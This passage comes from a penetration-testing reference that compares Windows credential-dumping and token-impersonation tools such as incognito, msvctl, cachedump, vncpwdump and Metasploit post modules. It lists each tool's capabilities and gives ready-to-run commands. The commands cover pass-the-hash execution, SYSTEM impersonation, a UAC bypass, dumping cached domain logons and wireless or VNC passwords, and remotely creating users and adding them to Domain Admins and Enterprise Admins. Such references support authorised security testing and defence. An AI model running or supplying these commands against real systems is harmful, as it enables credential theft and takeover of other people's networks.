    C:\>runhash.exe <domain>\<user>::<LM hash>:<NT hash>::: cmd.exe

msvctl
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: Yes (dump and impersonate) | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: No. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: No | RDP session isolation: Yes. See notes
  Notes: On 64-bit architecture it fails and displays "error: code: -10". Use RunhAsh, mimikatz or WCE instead. On remote logon sessions via RDP it fails and displays "error: code: -10"; run as SYSTEM to avoid this.
  Commands:
    C:\>msvctl.exe list
    C:\>msvctl.exe <domain>\<user> <LM hash>:<NT hash> run cmd.exe

incognito
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: Yes (list and impersonate) | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Unreliable. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Unreliable. See notes | RDP session isolation: Yes
  Notes: This tool is not officially supported on 64-bit architecture and recent versions of Windows. Run it a few times to list all available tokens and impersonate properly.
  Commands:
    Run as an administrative user:
    C:\>incognito.exe -h 127.0.0.1 list_tokens -u # list available user tokens
    C:\>incognito.exe -h 127.0.0.1 list_tokens -g # list available group tokens
    C:\>incognito.exe -h 127.0.0.1 execute -c "NT AUTHORITY\SYSTEM" cmd.exe # impersonate Local System
    C:\>incognito.exe -h 127.0.0.1 add_user -h <domaincontrollerip> youruser yourpassword # add a domain user
    C:\>incognito.exe -h 127.0.0.1 add_group_user -h <domaincontrollerip> "Domain Admins" youruser # assign domain admin to user
    C:\>incognito.exe -h 127.0.0.1 add_group_user -h <domaincontrollerip> "Enterprise Admins" youruser # assign ent admin to user
    C:\>incognito.exe -h 192.168.0.1 list_tokens -u # remote, list available user tokens
    C:\>incognito.exe -h 192.168.0.1 list_tokens -g # remote, list available group tokens
    C:\>incognito.exe -h 192.168.0.1 execute -c "NT AUTHORITY\SYSTEM" cmd.exe # impersonate Local System
    C:\>incognito.exe -h 192.168.0.1 add_user -h <domaincontrollerip> <user> <password> # remote, add a domain user
    C:\>incognito.exe -h 192.168.0.1 add_group_user -h <domaincontrollerip> "Domain Admins" <user> # remote, assign domain admin to user
    C:\>incognito.exe -h 192.168.0.1 add_group_user -h <domaincontrollerip> "Enterprise Admins" <user> # remote, assign ent admin to user

    Run as SYSTEM (psexec.exe -s cmd.exe):
    C:\>incognito.exe list_tokens -u # list available user tokens
    C:\>incognito.exe list_tokens -g # list available group tokens
    C:\>incognito.exe execute -c "<domain|workgroup>\user" cmd.exe # impersonate a <domain|workgroup> user

find_token
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: Yes (list) | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Unreliable. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Unreliable. See notes | RDP session isolation: Yes
  Notes: This tool is not officially supported on 64-bit architecture and recent versions of Windows. Run it a few times to list all available tokens.
  Commands:
    Run as an administrator user:
    C:\>find_token.exe 127.0.0.1
    C:\>find_token.exe 192.168.0.1 # remote, one IP
    C:\>find_token.exe -f ips.txt # remote, IP list
    C:\>find_token.exe 192.168.0.1 Administrator <password> # remote, one IP
    C:\>find_token.exe -f ips.txt Administrator <password> # remote, IP list

    Run as SYSTEM (psexec.exe -s cmd.exe):
    C:\>find_token.exe 127.0.0.1

cachedump
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (in-memory)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: No. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: No (?) | RDP session isolation: Yes
  Notes: On 64-bit architecture it fails and displays "ERROR Unable to LoadLibrary lsasrv.dll (code 126)".
  Commands:
    C:\>cachedump.exe -v

Metasploit gather/cachedump (post module)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (from registry files)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: -
  Commands:
    run post/windows/gather/cachedump

WirelessKeyView
  Command line: Yes | GUI: Yes | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: Yes | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: Make sure you run the 64-bit version of this tool on 64-bit architecture, otherwise no entries will be dumped.
  Commands:
    C:\>WirelessKeyView.exe /codeinject 1 /stab WirelessKeyView_tab.txt

Metasploit wlan/wlan_profile (post module)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: Yes | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: -
  Commands:
    run post/windows/escalate/bypassuac
    Background session <X>? [y/N] y
    msf exploit(handler) > sessions -l
    msf exploit(handler) > sessions -i <X>+1 # these steps are recommended against Windows Vista and Windows 7 to dump the clear-text wireless password/passphrase
    run post/windows/wlan/wlan_profile

vncpwdump
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: Yes | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: -
  Commands:
    C:\>vncpwdump.exe -c -s -d

VNCPassView
  Command line: Yes | GUI: Yes | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: Yes | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: -
  Commands:
    C:\>VNCPassView.exe /stab vncpassview.txt

Metasploit gather/vnc (post module)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: Yes | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: -
  Commands:
    run post/windows/gather/credentials/vnc

Metasploit getvncpw (script)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: Yes | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: -
  Commands:
    run getvncpw

by Bernardo Damele A. G.
http://bernardodamele.blogspot.com/search/label/dump